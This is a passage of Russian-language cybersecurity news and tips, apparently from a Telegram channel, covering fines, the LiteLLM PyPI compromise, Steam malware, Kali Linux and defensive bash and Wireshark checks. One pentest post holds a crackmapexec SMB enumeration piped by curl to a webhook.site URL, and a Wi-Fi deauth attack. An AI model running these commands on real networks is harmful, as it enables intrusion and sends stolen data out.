КИБЕРБАСТИОН

🧐В Санкт-Петербурге провайдера оштрафовали за обход блокировок Мировой суд Санкт-Петербурга оштрафовал интернет-провайдера «Тинко» на 250 000 рублей за то, что трафик компании шел в обход технических средств противодействия угрозам (ТСПУ), а клиенты могли свободно пользоваться запрещенными платформами. Судья судебного участка № 178 привлекла «Тинко» к ответственности по ч. 1 ст. 13.42.1 КоАП (неисполнение обязанностей по пропуску трафика через ТСПУ). Санкция статьи предусматривает штраф в разме...

🧐Штраф за оскорбление в MАХ В России выписали первый штраф за оскорбление в MAX — за то, что чиновник оскорбил своего начальника в рабочем чате. Суд признал сотрудника администрации виновным по статье о публичном оскорблении в интернете и назначил 12 тысяч рублей штрафа #Кибербастион #Штраф #MAX

🧐LiteLLM взломали через CI: украли токены и залили малварь в PyPI Популярную библиотеку LiteLLM просто компрометировали и залили вредоносные версии прямо в PyPI. Речь про 1.82.7 и 1.82.8. Если Вы их устанавливали, есть шанс, что все Ваши ключи уже где-то "гуляют". Самое неприятное, что GitHub репозиторий был чистый, атака шла именно через публикацию пакета. Сначала сломали Trivy, тот самый сканер зависимостей из CI. Через него утек токен, который использовался в пайплайне LiteLLM. Дальше всё пр...

🧐Антисниффер Антиснифферы - это программные инструменты, предназначенные для обнаружения и предотвращения сниффинга пакетов. Бесплатные и открытые антиснифферы: • Kismet: анализатор беспроводных сетей с возможностями обнаружения сниффинга. • Cain & Abel: набор инструментов для восстановления паролей и анализа сети, который включает в себя модуль обнаружения сниффинга. • Ettercap: инструмент перехвата сетевого трафика с возможностями обнаружения сниффинга. Коммерческие антиснифферы: • NetWitness...

🧐3 способа для проведения веб-пентестинга 1. Быстрое перечисление SMB-шар без кредов + отправка результатов на webhook: собирает пользователей, шары и политики, логирует удаленно: crackmapexec smb target.example.com –shares –users –pass-pol | curl -s -X POST https://webhook.site/your-id –data-binary @- 2. Wi-Fi deauth-атака с подтверждением через webhook: отключает клиентов от AP, пинг на webhook подтверждает успех (клиент reconnect’ится и триггерит): airodump-ng wlan0mon # найди BSSID и клиент...

🧐Вышел новый дистрибутив Kali Linux 2026.1 Компания Offensive Security выпустила Kali Linux 2026.1 — последнюю стабильную версию дистрибутива GNU/Linux на базе Debian для пентестинга и этичного хакинга. Появились новые инструменты: 1. AdaptixC2 — расширяемая платформа для постэксплуатации и эмуляции атак; 2. Atomic-Operator — инструмент для выполнения тестов Atomic Red Team в различных операционных системах; 3. Fluxion — инструмент для аудита безопасности и исследования социальной инженерии. Кр...

🧐Атаки на UEFI UEFI - мини-ОС, которая стартует раньше загрузчика, раньше ядра, раньше любого антивируса. Код, записанный в SPI-флеш материнской платы, живёт независимо от диска. Форматирование, смена накопителя и переустановка системы его не затрагивают. Реальные примеры - CosmicStrand, MoonBounce, BlackLotus - все три пережили полный вайп диска. Атакующий с правами администратора записывает вредоносный DXE-драйвер в NVRAM через уязвимый UEFI-апдейтер, либо патчит загрузчик ОС ещё до её старта...

🧐В Steam обнаружили вредоносные игры ФБР пытается установить личности лиц, пострадавших после установки одной из вредоносных игр в Steam с мая 2024 года по январь 2026 года. В рамках расследования бюро выявило несколько вредоносных игр: BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi и Tokenova. Для передачи информации ФБР предлагает заполнить короткую форму, отвечая на вопросы о криптовалютных транзакциях, скомпрометированных учётных записях и украденных деньгах Анкета запраш...

🧐5 лайфхаков для bash 1. Детектим инъекцию в легитимный процесс: for pid in /proc/[0-9]; do maps="$pid/maps"; [[ -f $maps ]] && grep -l "rwxp" $maps 2>/dev/null; done Исполняемые анонимные регионы памяти (rwxp без файла) - частый признак shellcode injection или memfd_create. 2. Ищем процессы без файла на диске: for pid in /proc/[0-9]; do exe=$(readlink $pid/exe 2>/dev/null); [[ $exe == "(deleted)" ]] && cat $pid/cmdline | tr '\0' ' ' && echo; done Малварь...

🧐Поиск MITM TCP-пересборка соединения - первый тревожный маркер: tcp.flags.reset == 1 || tcp.flags.syn == 1 Если вы видите лишние сбросы там, где трафик должен быть стабильным, почти всегда это следствие вмешательства. Понижение версии TLS: tls.handshake.version Cipher Suites и расширения как отпечаток посредника: Добавьте в отображение параметры TLS и сравните их между несколькими сессиями к одному и тому же домену. Если поведение «плавает» - сервер, скорее всего, уже не тот. DNS как точка вхо...